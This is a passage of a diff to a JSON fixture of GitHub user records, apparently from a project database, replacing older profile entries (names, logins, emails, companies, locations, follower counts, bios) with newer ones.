"2024-09-16T20:22:19Z", + "node_id": "MDQ6VXNlcjE1OTA0NTQz", + "bio": "Software Engineer at @philips-software focussing on Open/Inner Source tooling and Software Bill of Materials.\r\n📚 Busy setting up the OSPO of Philips.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2158, + "pk": 7482, "fields": { - "nest_created_at": "2024-09-12T01:09:35.455Z", - "nest_updated_at": "2024-09-12T01:09:35.455Z", - "name": "", - "login": "Al192168", + "nest_created_at": "2024-09-22T08:48:14.636Z", + "nest_updated_at": "2024-09-22T19:32:57.721Z", + "name": "Stephen Edgar", + "login": "ntwb", + "email": "stephen@netweb.com.au", + "avatar_url": "https://avatars.githubusercontent.com/u/1016458?v=4", + "company": "netweb", + "location": "Melbourne, Victoria, Australia", + "collaborators_count": 0, + "following_count": 259, + "followers_count": 258, + "public_gists_count": 50, + "public_repositories_count": 84, + "created_at": "2011-08-31T08:48:11Z", + "updated_at": "2024-09-20T20:51:08Z", + "node_id": "MDQ6VXNlcjEwMTY0NTg=", + "bio": "Senior Web Engineer @humanmade\r\n\r\nAlso @stylelint, @bbpress,\r\n@buddypress, @WordPress Build/Test Tools maintainer\r\n", + "is_hireable": false, + "twitter_username": "netweb" + } +}, +{ + "model": "github.user", + "pk": 7483, + "fields": { + "nest_created_at": "2024-09-22T08:48:14.949Z", + "nest_updated_at": "2024-09-22T19:32:58.066Z", + "name": "Jan Peer Stöcklmair", + "login": "JPeer264", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/55237421?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10677263?v=4", + "company": "@dynatrace", + "location": "Vienna / AUT / Europe / Earth ", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2019-09-12T10:46:17Z", - "updated_at": "2020-01-08T16:29:28Z", - "node_id": "MDQ6VXNlcjU1MjM3NDIx", + "following_count": 122, + "followers_count": 65, + "public_gists_count": 2, + "public_repositories_count": 171, + "created_at": "2015-01-23T22:28:17Z", + "updated_at": "2024-09-02T11:42:16Z", + "node_id": "MDQ6VXNlcjEwNjc3MjYz", + "bio": "CSS and JS fanatic. Love to contribute in open-source.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7484, + "fields": { + "nest_created_at": "2024-09-22T08:48:15.261Z", + "nest_updated_at": "2024-09-22T19:32:58.388Z", + "name": "kyle shay", + "login": "kyleshay", + "email": "kyle.shay@ymail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/424158?v=4", + "company": "@dropbox", + "location": "Oakland, CA", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 45, + "public_gists_count": 1, + "public_repositories_count": 44, + "created_at": "2010-10-02T02:46:25Z", + "updated_at": "2024-03-02T00:26:24Z", + "node_id": "MDQ6VXNlcjQyNDE1OA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -414203,249 +673027,324 @@ }, { "model": "github.user", - "pk": 2159, + "pk": 7485, "fields": { - "nest_created_at": "2024-09-12T01:09:36.303Z", - "nest_updated_at": "2024-09-12T01:09:36.303Z", - "name": "Kondal", - "login": "tkr6743", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/38727383?v=4", + "nest_created_at": "2024-09-22T08:48:15.611Z", + "nest_updated_at": "2024-09-22T19:32:58.701Z", + "name": "Luke", + "login": "sunshinejr", + "email": "thesunshinejr@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5232779?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-04-25T13:50:43Z", - "updated_at": "2022-04-11T06:19:06Z", - "node_id": "MDQ6VXNlcjM4NzI3Mzgz", + "following_count": 190, + "followers_count": 831, + "public_gists_count": 17, + "public_repositories_count": 27, + "created_at": "2013-08-14T21:02:27Z", + "updated_at": "2023-12-31T20:15:13Z", + "node_id": "MDQ6VXNlcjUyMzI3Nzk=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "thesunshinejr" } }, { "model": "github.user", - "pk": 2160, + "pk": 7486, "fields": { - "nest_created_at": "2024-09-12T01:09:37.157Z", - "nest_updated_at": "2024-09-12T01:09:37.157Z", - "name": "Alexander Stein (Inactive)", - "login": "tohch4", + "nest_created_at": "2024-09-22T08:48:15.933Z", + "nest_updated_at": "2024-09-22T19:32:59.007Z", + "name": "Avi Schwab", + "login": "froboy", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/39844334?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/238201?v=4", "company": "", - "location": "", + "location": "Chicago, IL", "collaborators_count": 0, - "following_count": 6, - "followers_count": 7, - "public_gists_count": 7, - "public_repositories_count": 106, - "created_at": "2018-06-01T23:42:56Z", - "updated_at": "2024-08-22T21:53:44Z", - "node_id": "MDQ6VXNlcjM5ODQ0MzM0", - "bio": "I am a former employee of Flexion. This account is no longer active as of 5 November 2021.", + "following_count": 11, + "followers_count": 19, + "public_gists_count": 18, + "public_repositories_count": 71, + "created_at": "2010-04-06T19:25:18Z", + "updated_at": "2024-09-10T21:53:54Z", + "node_id": "MDQ6VXNlcjIzODIwMQ==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2161, + "pk": 7487, "fields": { - "nest_created_at": "2024-09-12T01:09:37.952Z", - "nest_updated_at": "2024-09-12T01:09:37.952Z", - "name": "Ederson Brilhante", - "login": "edersonbrilhante", - "email": "contato@edersonbrilhante.com.br", - "avatar_url": "https://avatars.githubusercontent.com/u/1094995?v=4", - "company": "@cisco", - "location": "Krakow - Poland", + "nest_created_at": "2024-09-22T08:48:16.254Z", + "nest_updated_at": "2024-09-22T19:32:59.327Z", + "name": "Matteo Vivona", + "login": "matteovivona", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6388707?v=4", + "company": "", + "location": "Udine, Italy", "collaborators_count": 0, - "following_count": 84, - "followers_count": 76, - "public_gists_count": 2, - "public_repositories_count": 44, - "created_at": "2011-10-01T15:17:46Z", - "updated_at": "2024-08-19T10:46:09Z", - "node_id": "MDQ6VXNlcjEwOTQ5OTU=", - "bio": "SRE Tech Lead", + "following_count": 54, + "followers_count": 50, + "public_gists_count": 13, + "public_repositories_count": 13, + "created_at": "2014-01-13T10:50:48Z", + "updated_at": "2024-08-08T10:09:04Z", + "node_id": "MDQ6VXNlcjYzODg3MDc=", + "bio": "Certified Kubernetes Administrator (CKA) and Microsoft Azure Administrator Associate", + "is_hireable": true, + "twitter_username": "tehKapa" + } +}, +{ + "model": "github.user", + "pk": 7488, + "fields": { + "nest_created_at": "2024-09-22T08:48:16.638Z", + "nest_updated_at": "2024-09-22T19:32:59.643Z", + "name": "Mike Bifulco", + "login": "mbifulco", + "email": "mbifulco@live.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1844496?v=4", + "company": "Co-founder, CTO @ Craftwork", + "location": "Charlotte, NC", + "collaborators_count": 0, + "following_count": 93, + "followers_count": 137, + "public_gists_count": 18, + "public_repositories_count": 89, + "created_at": "2012-06-12T22:52:14Z", + "updated_at": "2024-09-06T15:52:12Z", + "node_id": "MDQ6VXNlcjE4NDQ0OTY=", + "bio": "Developer Advocate, author, podcaster, helping react devs build great products & companies.\r\n\r\nPast: Google, Stripe, Microsoft, smpl, Gymnasium", "is_hireable": false, - "twitter_username": "ederbrilhante" + "twitter_username": "irreverentmike" } }, { "model": "github.user", - "pk": 2162, + "pk": 7489, "fields": { - "nest_created_at": "2024-09-12T01:09:38.777Z", - "nest_updated_at": "2024-09-12T01:09:38.777Z", - "name": "", - "login": "nbublikov", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/68223804?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:48:16.960Z", + "nest_updated_at": "2024-09-22T19:32:59.959Z", + "name": "Nicolò Ribaudo", + "login": "nicolo-ribaudo", + "email": "hello@nicr.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/7000710?v=4", + "company": "@babel, @igalia", + "location": "Turin, Italy", "collaborators_count": 0, - "following_count": 3, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2020-07-13T09:44:08Z", - "updated_at": "2022-01-25T21:07:48Z", - "node_id": "MDQ6VXNlcjY4MjIzODA0", + "following_count": 8, + "followers_count": 1152, + "public_gists_count": 10, + "public_repositories_count": 213, + "created_at": "2014-03-19T16:15:26Z", + "updated_at": "2024-09-13T23:04:20Z", + "node_id": "MDQ6VXNlcjcwMDA3MTA=", "bio": "", "is_hireable": false, + "twitter_username": "NicoloRibaudo" + } +}, +{ + "model": "github.user", + "pk": 7490, + "fields": { + "nest_created_at": "2024-09-22T08:48:17.277Z", + "nest_updated_at": "2024-09-22T19:33:00.279Z", + "name": "Syrus Akbary", + "login": "syrusakbary", + "email": "me@syrusakbary.com", + "avatar_url": "https://avatars.githubusercontent.com/u/188257?v=4", + "company": "@wasmerio ", + "location": "San Francisco, CA", + "collaborators_count": 0, + "following_count": 36, + "followers_count": 1091, + "public_gists_count": 26, + "public_repositories_count": 188, + "created_at": "2010-01-23T12:24:40Z", + "updated_at": "2024-07-17T15:56:57Z", + "node_id": "MDQ6VXNlcjE4ODI1Nw==", + "bio": "Entrepreneur. Mathematician. @wasmerio CEO (YC S19).\r\n@GraphQL-Python creator. Author of Graphene, pyjade, promises (py) and other cool stuff... 😄", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2163, + "pk": 7491, "fields": { - "nest_created_at": "2024-09-12T01:09:39.581Z", - "nest_updated_at": "2024-09-12T01:09:39.581Z", - "name": "", - "login": "vishnupriyaavp8", + "nest_created_at": "2024-09-22T08:48:17.594Z", + "nest_updated_at": "2024-09-22T19:33:00.590Z", + "name": "Yongmin", + "login": "revi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/54842012?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7630875?v=4", "company": "", - "location": "", + "location": "Hwaseong, South Korea", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-09-03T09:54:15Z", - "updated_at": "2022-02-27T18:48:53Z", - "node_id": "MDQ6VXNlcjU0ODQyMDEy", - "bio": "", + "following_count": 58, + "followers_count": 77, + "public_gists_count": 7, + "public_repositories_count": 14, + "created_at": "2014-05-19T13:22:47Z", + "updated_at": "2024-09-17T04:12:59Z", + "node_id": "MDQ6VXNlcjc2MzA4NzU=", + "bio": "amateur translator, real newbie coder, chief laziness officer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2164, + "pk": 7492, "fields": { - "nest_created_at": "2024-09-12T01:09:40.396Z", - "nest_updated_at": "2024-09-12T01:09:40.396Z", + "nest_created_at": "2024-09-22T08:48:17.917Z", + "nest_updated_at": "2024-09-22T19:33:00.924Z", "name": "", - "login": "tungtran01", + "login": "nothingismagick", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/56481784?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/35242872?v=4", + "company": "@tauri-apps", + "location": "Malta", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2019-10-12T15:07:39Z", - "updated_at": "2023-08-03T18:32:09Z", - "node_id": "MDQ6VXNlcjU2NDgxNzg0", - "bio": "", + "following_count": 418, + "followers_count": 527, + "public_gists_count": 21, + "public_repositories_count": 113, + "created_at": "2018-01-09T00:09:24Z", + "updated_at": "2023-05-09T13:31:26Z", + "node_id": "MDQ6VXNlcjM1MjQyODcy", + "bio": "Developer, Systems Architect and IT Strategist", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2165, + "pk": 7493, "fields": { - "nest_created_at": "2024-09-12T01:09:41.226Z", - "nest_updated_at": "2024-09-14T19:17:54.847Z", - "name": "", - "login": "valentijnscholten", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4426050?v=4", - "company": "ISAAC", - "location": "Eindhoven", + "nest_created_at": "2024-09-22T08:48:18.241Z", + "nest_updated_at": "2024-09-22T19:33:01.230Z", + "name": "Šimon Let", + "login": "curusarn", + "email": "simon@betterstack.com", + "avatar_url": "https://avatars.githubusercontent.com/u/10132717?v=4", + "company": "@BetterStackHQ ", + "location": "Prague, Czechia", "collaborators_count": 0, - "following_count": 0, - "followers_count": 29, - "public_gists_count": 4, - "public_repositories_count": 35, - "created_at": "2013-05-14T09:16:26Z", - "updated_at": "2024-08-20T20:57:21Z", - "node_id": "MDQ6VXNlcjQ0MjYwNTA=", - "bio": "", + "following_count": 323, + "followers_count": 65, + "public_gists_count": 3, + "public_repositories_count": 85, + "created_at": "2014-12-09T17:38:25Z", + "updated_at": "2024-08-14T12:48:01Z", + "node_id": "MDQ6VXNlcjEwMTMyNzE3", + "bio": "Make difficult things simple", "is_hireable": false, - "twitter_username": "valentijn" + "twitter_username": "curusarn" } }, { "model": "github.user", - "pk": 2166, + "pk": 7494, "fields": { - "nest_created_at": "2024-09-12T01:09:42.056Z", - "nest_updated_at": "2024-09-12T01:09:42.057Z", - "name": "", - "login": "desebjohnston", + "nest_created_at": "2024-09-22T08:48:18.550Z", + "nest_updated_at": "2024-09-22T19:33:01.553Z", + "name": "g0tmi1k", + "login": "g0tmi1k", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/95700859?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/535942?v=4", "company": "", - "location": "", + "location": "UK", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2021-12-07T14:58:07Z", - "updated_at": "2024-06-25T13:38:25Z", - "node_id": "U_kgDOBbRHew", - "bio": "", + "following_count": 9, + "followers_count": 3283, + "public_gists_count": 2, + "public_repositories_count": 64, + "created_at": "2010-12-25T00:50:40Z", + "updated_at": "2024-07-17T15:11:53Z", + "node_id": "MDQ6VXNlcjUzNTk0Mg==", + "bio": "=)", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2167, + "pk": 7495, "fields": { - "nest_created_at": "2024-09-12T01:09:42.864Z", - "nest_updated_at": "2024-09-12T01:15:50.094Z", - "name": "Jordi Sayeras", - "login": "jsayerascb", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/143995941?v=4", - "company": "CloudBees", - "location": "", + "nest_created_at": "2024-09-22T08:48:18.876Z", + "nest_updated_at": "2024-09-22T19:33:01.889Z", + "name": "Bryan Van de Ven", + "login": "bryevdv", + "email": "bryan@bokeh.org", + "avatar_url": "https://avatars.githubusercontent.com/u/1078448?v=4", + "company": "Nvidia", + "location": "Portland, OR", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-09-04T06:49:15Z", - "updated_at": "2024-07-23T07:59:11Z", - "node_id": "U_kgDOCJU0JQ", - "bio": "", + "followers_count": 548, + "public_gists_count": 3, + "public_repositories_count": 20, + "created_at": "2011-09-25T16:14:40Z", + "updated_at": "2024-09-17T14:02:02Z", + "node_id": "MDQ6VXNlcjEwNzg0NDg=", + "bio": "Co-creator and core team for @bokeh. Original author of @conda. Contributor to @rapidsai and @nv-legate ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2168, + "pk": 7496, "fields": { - "nest_created_at": "2024-09-12T01:09:43.757Z", - "nest_updated_at": "2024-09-13T05:10:00.458Z", + "nest_created_at": "2024-09-22T08:48:19.208Z", + "nest_updated_at": "2024-09-22T19:33:02.206Z", + "name": "Yaw Anokwa", + "login": "yanokwa", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32369?v=4", + "company": "@getodk", + "location": "San Diego, CA", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 194, + "public_gists_count": 11, + "public_repositories_count": 94, + "created_at": "2008-11-03T08:11:50Z", + "updated_at": "2024-07-29T15:41:07Z", + "node_id": "MDQ6VXNlcjMyMzY5", + "bio": "Founder and CEO of ODK (@getodk). We make data collection software that researchers, field teams, and other professionals use to collect data that matters.", + "is_hireable": false, + "twitter_username": "yanokwa" + } +}, +{ + "model": "github.user", + "pk": 7497, + "fields": { + "nest_created_at": "2024-09-22T08:48:19.517Z", + "nest_updated_at": "2024-09-22T19:33:02.514Z", "name": "", - "login": "resphantom", + "login": "hampuskraft", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/78911523?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/24176136?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2021-02-11T12:32:55Z", - "updated_at": "2024-02-24T09:14:13Z", - "node_id": "MDQ6VXNlcjc4OTExNTIz", + "public_gists_count": 1, + "public_repositories_count": 2, + "created_at": "2016-11-26T10:44:02Z", + "updated_at": "2024-09-18T13:56:04Z", + "node_id": "MDQ6VXNlcjI0MTc2MTM2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -414453,224 +673352,249 @@ }, { "model": "github.user", - "pk": 2169, + "pk": 7498, "fields": { - "nest_created_at": "2024-09-12T01:09:45.158Z", - "nest_updated_at": "2024-09-12T01:18:53.492Z", - "name": "Aaron Weaver", - "login": "aaronweaver", + "nest_created_at": "2024-09-22T08:48:19.827Z", + "nest_updated_at": "2024-09-22T19:33:02.865Z", + "name": "Andrea Cioccarelli", + "login": "cioccarellia", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/220838?v=4", - "company": "OWASP", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23010471?v=4", + "company": "", + "location": "Italy", "collaborators_count": 0, - "following_count": 3, - "followers_count": 59, - "public_gists_count": 3, - "public_repositories_count": 36, - "created_at": "2010-03-11T19:54:19Z", - "updated_at": "2024-08-16T11:19:15Z", - "node_id": "MDQ6VXNlcjIyMDgzOA==", - "bio": "", + "following_count": 23, + "followers_count": 134, + "public_gists_count": 2, + "public_repositories_count": 26, + "created_at": "2016-10-23T09:35:49Z", + "updated_at": "2024-09-19T09:38:56Z", + "node_id": "MDQ6VXNlcjIzMDEwNDcx", + "bio": "23. android & kotlin dev, karate & krav, traveler, engineering student, avgeek. 🇮🇹", "is_hireable": false, - "twitter_username": "" + "twitter_username": "cioccarellia" } }, { "model": "github.user", - "pk": 2170, + "pk": 7499, "fields": { - "nest_created_at": "2024-09-12T01:10:20.573Z", - "nest_updated_at": "2024-09-12T01:11:36.894Z", - "name": "Stefan Fleckenstein", - "login": "StefanFl", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2698502?v=4", - "company": "MaibornWolff GmbH", - "location": "", + "nest_created_at": "2024-09-22T08:48:20.149Z", + "nest_updated_at": "2024-09-22T19:33:03.185Z", + "name": "Adam Brin", + "login": "abrin", + "email": "adam@brin.org", + "avatar_url": "https://avatars.githubusercontent.com/u/192686?v=4", + "company": "The Getty", + "location": "Los Angeles", "collaborators_count": 0, "following_count": 1, - "followers_count": 7, - "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2012-11-01T11:57:52Z", - "updated_at": "2024-09-11T13:46:33Z", - "node_id": "MDQ6VXNlcjI2OTg1MDI=", + "followers_count": 14, + "public_gists_count": 1, + "public_repositories_count": 22, + "created_at": "2010-01-30T03:19:24Z", + "updated_at": "2024-06-14T19:35:10Z", + "node_id": "MDQ6VXNlcjE5MjY4Ng==", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "abrin523" } }, { "model": "github.user", - "pk": 2171, + "pk": 7500, "fields": { - "nest_created_at": "2024-09-12T01:10:21.798Z", - "nest_updated_at": "2024-09-12T01:10:21.798Z", - "name": "Panda", - "login": "Homopatrol", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/58219367?v=4", - "company": "", - "location": "UK", + "nest_created_at": "2024-09-22T08:48:20.466Z", + "nest_updated_at": "2024-09-22T19:33:03.507Z", + "name": "Aaron Parecki", + "login": "aaronpk", + "email": "aaron@parecki.com", + "avatar_url": "https://avatars.githubusercontent.com/u/113001?v=4", + "company": "@okta", + "location": "Portland, OR", "collaborators_count": 0, - "following_count": 9, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 34, - "created_at": "2019-11-26T13:06:09Z", - "updated_at": "2024-09-07T20:02:18Z", - "node_id": "MDQ6VXNlcjU4MjE5MzY3", - "bio": "Getting to grips with Cloud Security and trying to help others along the way.\r\n---->\r\nMy name is not targeted at anyone, I myself a proud LGBTQ+ member. <----", - "is_hireable": true, + "following_count": 69, + "followers_count": 1792, + "public_gists_count": 155, + "public_repositories_count": 178, + "created_at": "2009-08-07T18:27:56Z", + "updated_at": "2024-08-04T12:45:01Z", + "node_id": "MDQ6VXNlcjExMzAwMQ==", + "bio": "Spec Editor • Cofounder of #indieweb • I maintain oauth.net", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2172, + "pk": 7501, "fields": { - "nest_created_at": "2024-09-12T01:10:22.176Z", - "nest_updated_at": "2024-09-12T01:18:36.975Z", - "name": "", - "login": "ptrovatelli", + "nest_created_at": "2024-09-22T08:48:20.831Z", + "nest_updated_at": "2024-09-22T19:33:03.828Z", + "name": "Brad Choate", + "login": "bradchoate", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/34663482?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22245?v=4", + "company": "@themaven-net", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 7, - "public_gists_count": 2, - "public_repositories_count": 14, - "created_at": "2017-12-18T21:48:50Z", - "updated_at": "2024-08-10T11:38:53Z", - "node_id": "MDQ6VXNlcjM0NjYzNDgy", + "following_count": 106, + "followers_count": 148, + "public_gists_count": 5, + "public_repositories_count": 29, + "created_at": "2008-08-27T19:42:15Z", + "updated_at": "2024-09-21T00:24:05Z", + "node_id": "MDQ6VXNlcjIyMjQ1", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "bradchoate" } }, { "model": "github.user", - "pk": 2173, + "pk": 7502, "fields": { - "nest_created_at": "2024-09-12T01:10:23.463Z", - "nest_updated_at": "2024-09-12T01:18:36.134Z", - "name": "Fred Blaise", - "login": "madchap", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5468769?v=4", - "company": "", - "location": "Vaud, Switzerland", + "nest_created_at": "2024-09-22T08:48:21.142Z", + "nest_updated_at": "2024-09-22T19:33:04.150Z", + "name": "Chris Adams", + "login": "mrchrisadams", + "email": "chris@productscience.co.uk", + "avatar_url": "https://avatars.githubusercontent.com/u/17906?v=4", + "company": "Product Science", + "location": "Berlin, and occasionally London", "collaborators_count": 0, - "following_count": 14, - "followers_count": 42, - "public_gists_count": 22, - "public_repositories_count": 87, - "created_at": "2013-09-16T10:09:23Z", - "updated_at": "2024-08-24T11:24:49Z", - "node_id": "MDQ6VXNlcjU0Njg3Njk=", - "bio": "Product Security", + "following_count": 173, + "followers_count": 214, + "public_gists_count": 245, + "public_repositories_count": 236, + "created_at": "2008-07-22T16:00:07Z", + "updated_at": "2024-09-19T09:14:42Z", + "node_id": "MDQ6VXNlcjE3OTA2", + "bio": "Environmentally focussed tech generalist. User research, product management and strategy, and yes, even code sometimes", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2174, + "pk": 7503, "fields": { - "nest_created_at": "2024-09-12T01:10:27.252Z", - "nest_updated_at": "2024-09-12T01:10:27.252Z", - "name": "", - "login": "chanduaki", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/54622987?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:48:21.460Z", + "nest_updated_at": "2024-09-22T19:33:04.472Z", + "name": "Ee Durbin", + "login": "ewdurbin", + "email": "ewdurbin@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1200832?v=4", + "company": "@psf", + "location": "Philadelphia, PA", "collaborators_count": 0, - "following_count": 8, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2019-08-28T09:32:06Z", - "updated_at": "2024-07-15T14:04:40Z", - "node_id": "MDQ6VXNlcjU0NjIyOTg3", - "bio": "", + "following_count": 0, + "followers_count": 822, + "public_gists_count": 19, + "public_repositories_count": 134, + "created_at": "2011-11-17T00:36:12Z", + "updated_at": "2024-08-01T14:39:50Z", + "node_id": "MDQ6VXNlcjEyMDA4MzI=", + "bio": "Director of Infrastructure - Python Software Foundation.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2175, + "pk": 7504, "fields": { - "nest_created_at": "2024-09-12T01:10:28.115Z", - "nest_updated_at": "2024-09-12T01:11:08.591Z", - "name": "", - "login": "zakrush", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/33844164?v=4", + "nest_created_at": "2024-09-22T08:48:22.101Z", + "nest_updated_at": "2024-09-22T19:33:05.108Z", + "name": "Glyph", + "login": "glyph", + "email": "code@glyph.im", + "avatar_url": "https://avatars.githubusercontent.com/u/716529?v=4", "company": "", - "location": "", + "location": "San Francisco Exclusion Zone", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 4, - "public_repositories_count": 14, - "created_at": "2017-11-20T19:24:14Z", - "updated_at": "2023-11-16T06:45:31Z", - "node_id": "MDQ6VXNlcjMzODQ0MTY0", - "bio": "", + "following_count": 16, + "followers_count": 805, + "public_gists_count": 19, + "public_repositories_count": 151, + "created_at": "2011-04-08T01:32:24Z", + "updated_at": "2024-09-22T11:25:44Z", + "node_id": "MDQ6VXNlcjcxNjUyOQ==", + "bio": "Founder of the Twisted project. Aspiring digital flâneur.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "glyph" } }, { "model": "github.user", - "pk": 2176, + "pk": 7505, "fields": { - "nest_created_at": "2024-09-12T01:10:30.251Z", - "nest_updated_at": "2024-09-12T01:10:30.251Z", - "name": "Tiago Posse", - "login": "tiagoposse", + "nest_created_at": "2024-09-22T08:48:22.451Z", + "nest_updated_at": "2024-09-22T19:33:05.421Z", + "name": "Gopinath Langote", + "login": "gopinath-langote", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2262091?v=4", - "company": "", - "location": "Vienna", + "avatar_url": "https://avatars.githubusercontent.com/u/10210778?v=4", + "company": "@gojek", + "location": "Bangalore, India", "collaborators_count": 0, - "following_count": 8, - "followers_count": 6, - "public_gists_count": 1, - "public_repositories_count": 36, - "created_at": "2012-09-01T19:03:48Z", - "updated_at": "2024-09-03T06:13:19Z", - "node_id": "MDQ6VXNlcjIyNjIwOTE=", - "bio": "", + "following_count": 59, + "followers_count": 73, + "public_gists_count": 9, + "public_repositories_count": 25, + "created_at": "2014-12-16T16:36:43Z", + "updated_at": "2024-09-05T11:31:46Z", + "node_id": "MDQ6VXNlcjEwMjEwNzc4", + "bio": "Engineering | Travel | Poetry - to get energy for doing all above, I drink coffee ☕️", + "is_hireable": true, + "twitter_username": "GopinathLangote" + } +}, +{ + "model": "github.user", + "pk": 7506, + "fields": { + "nest_created_at": "2024-09-22T08:48:22.775Z", + "nest_updated_at": "2024-09-22T19:33:05.732Z", + "name": "Hans Knöchel", + "login": "hansemannn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10667698?v=4", + "company": "Lambus", + "location": "Osnabrück, Germany", + "collaborators_count": 0, + "following_count": 113, + "followers_count": 376, + "public_gists_count": 127, + "public_repositories_count": 404, + "created_at": "2015-01-23T09:09:36Z", + "updated_at": "2024-09-06T06:55:36Z", + "node_id": "MDQ6VXNlcjEwNjY3Njk4", + "bio": "✨ CEO Lambus, prev. iOS lead @appcelerator, maintainer @TiDev", "is_hireable": false, - "twitter_username": "" + "twitter_username": "hansemannnn" } }, { "model": "github.user", - "pk": 2177, + "pk": 7507, "fields": { - "nest_created_at": "2024-09-12T01:10:31.892Z", - "nest_updated_at": "2024-09-12T01:10:44.933Z", + "nest_created_at": "2024-09-22T08:48:23.102Z", + "nest_updated_at": "2024-09-22T19:33:06.045Z", "name": "", - "login": "pgabriel10", + "login": "JohnClay", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/90704745?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/627077?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 8, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2021-09-14T14:12:23Z", - "updated_at": "2023-08-30T00:20:53Z", - "node_id": "MDQ6VXNlcjkwNzA0NzQ1", + "created_at": "2011-02-19T15:10:30Z", + "updated_at": "2024-01-16T15:10:08Z", + "node_id": "MDQ6VXNlcjYyNzA3Nw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -414678,174 +673602,199 @@ }, { "model": "github.user", - "pk": 2178, + "pk": 7508, "fields": { - "nest_created_at": "2024-09-12T01:10:33.661Z", - "nest_updated_at": "2024-09-12T01:10:57.996Z", - "name": "", - "login": "techylinux", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/37924175?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:48:23.426Z", + "nest_updated_at": "2024-09-22T19:33:06.368Z", + "name": "Kevin van Zonneveld", + "login": "kvz", + "email": "kevin@transloadit.com", + "avatar_url": "https://avatars.githubusercontent.com/u/26752?v=4", + "company": "Transloadit", + "location": "Amsterdam, The Netherlands", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 31, - "created_at": "2018-03-30T06:39:14Z", - "updated_at": 